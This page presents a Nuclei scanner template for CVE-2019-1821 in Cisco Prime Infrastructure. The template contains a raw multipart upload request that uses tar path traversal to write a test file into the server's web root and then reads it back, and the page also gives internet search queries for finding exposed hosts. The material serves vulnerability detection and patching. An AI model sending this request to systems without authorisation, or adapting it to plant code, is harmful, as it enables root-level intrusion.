Cisco Prime Infrastructure and Cisco Evolved Programmable Network Manager - Remote Code Execution
ID: CVE-2019-1821
Severity: critical
Author: _0xf4n9x_
Tags: cve,cve2019,packetstorm,rce,fileupload,unauth,intrusive,cisco
Description
Section titled “Description”Cisco Prime Infrastructure (PI) and Cisco Evolved Programmable Network (EPN) Manager could allow an authenticated, remote attacker to execute code with root-level privileges on the underlying operating system. This vulnerability exist because the software improperly validates user-supplied input. An attacker could exploit this vulnerability by uploading a malicious file to the administrative web interface. A successful exploit could allow the attacker to execute code with root-level privileges on the underlying operating system.
YAML Source
Section titled “YAML Source”id: CVE-2019-1821
info: name: Cisco Prime Infrastructure and Cisco Evolved Programmable Network Manager - Remote Code Execution author: _0xf4n9x_ severity: critical description: Cisco Prime Infrastructure (PI) and Cisco Evolved Programmable Network (EPN) Manager could allow an authenticated, remote attacker to execute code with root-level privileges on the underlying operating system. This vulnerability exist because the software improperly validates user-supplied input. An attacker could exploit this vulnerability by uploading a malicious file to the administrative web interface. A successful exploit could allow the attacker to execute code with root-level privileges on the underlying operating system. remediation: | Apply the latest security patches provided by Cisco to mitigate this vulnerability. reference: - https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190515-pi-rce - https://srcincite.io/blog/2019/05/17/panic-at-the-cisco-unauthenticated-rce-in-prime-infrastructure.html - https://nvd.nist.gov/vuln/detail/CVE-2019-1821 - http://packetstormsecurity.com/files/153350/Cisco-Prime-Infrastructure-Health-Monitor-TarArchive-Directory-Traversal.html - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2019-1821 cwe-id: CWE-20 epss-score: 0.96792 epss-percentile: 0.99681 cpe: cpe:2.3:a:cisco:evolved_programmable_network_manager:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: cisco product: evolved_programmable_network_manager shodan-query: http.title:"prime infrastructure" fofa-query: title="prime infrastructure" google-query: intitle:"prime infrastructure" tags: cve,cve2019,packetstorm,rce,fileupload,unauth,intrusive,cisco
http: - raw: - | POST /servlet/UploadServlet HTTP/1.1 Host: {{Hostname}} Accept-Encoding: gzip, deflate Primary-IP: 127.0.0.1 Filename: test.tar Filesize: 10240 Compressed-Archive: false Destination-Dir: tftpRoot Filecount: 1 Content-Length: 269 Content-Type: multipart/form-data; boundary=871a4a346a547cf05cb83f57b9ebcb83
--871a4a346a547cf05cb83f57b9ebcb83 Content-Disposition: form-data; name="files"; filename="test.tar"
../../opt/CSCOlumos/tomcat/webapps/ROOT/test.txt0000644000000000000000000000000400000000000017431 0ustar 00000000000000{{randstr}} --871a4a346a547cf05cb83f57b9ebcb83-- - | GET /test.txt HTTP/1.1 Host: {{Host}}
matchers: - type: dsl dsl: - "status_code == 200" - "contains((body_2), '{{randstr}}')" condition: and# digest: 4b0a00483046022100bf6156349e1669bcb98a5abd2d89fbb3e48a731b8f063371af17dffb63821c7d022100bdd98242390649fc02d50c211b479135c67b5ba689b4bb077612f8b2afde21a9:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2019/CVE-2019-1821.yaml"